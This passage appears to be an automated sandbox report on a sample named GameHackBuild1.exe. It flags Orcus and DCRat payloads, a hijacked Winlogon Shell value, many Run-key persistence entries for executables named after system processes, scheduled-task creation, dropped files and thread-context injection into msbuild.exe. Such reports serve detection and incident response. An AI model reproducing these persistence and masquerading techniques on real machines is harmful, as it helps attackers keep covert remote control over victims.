| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\", \"C:\\Windows\\de-DE\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\", \"C:\\Windows\\de-DE\\conhost.exe.exe\", \"C:\\Windows\\security\\templates\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\audiodg.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\dwm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
Orcus
Orcus family
Orcus main payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
|---|---|---|---|
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |

The row above appears 35 times in the original report, each entry identical; the repeats are collapsed here.
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Orcurs Rat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\containerRuntime = "\"C:\\Users\\Public\\Documents\\containerRuntime.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\containerRuntime = "\"C:\\Users\\Public\\Documents\\containerRuntime.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\Offline Web Pages\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\Default\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Users\\Default\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost.exe = "\"C:\\Windows\\de-DE\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Java\\jre7\\lib\\dwm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Windows\\security\\templates\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Public\\Favorites\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Public\\Favorites\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost.exe = "\"C:\\Users\\Default User\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\Offline Web Pages\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSBuild = "\"C:\\Program Files\\Uninstall Information\\MSBuild.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost.exe = "\"C:\\Windows\\de-DE\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost.exe = "\"C:\\Users\\Default User\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSBuild = "\"C:\\Program Files\\Uninstall Information\\MSBuild.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Windows\\security\\templates\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Java\\jre7\\lib\\dwm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | \??\c:\Windows\System32\CSC8AF8654FC13D48D0A5FAAA4B8D729FE.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\System32\3kmwe8.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1776 set thread context of 644 | N/A | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | \??\c:\Program Files\Windows Photo Viewer\en-US\CSC26E9B39D213245928B931B4D3D3897.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Program Files\Uninstall Information\fc1ee695700bed | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\6cb0b6c459d5d3 | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Windows Photo Viewer\42af1c969fbb7b | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\56085415360792 | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File opened for modification | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Windows Photo Viewer\en-US\088424020bedd6 | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | \??\c:\Program Files\Windows Photo Viewer\en-US\conhost.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
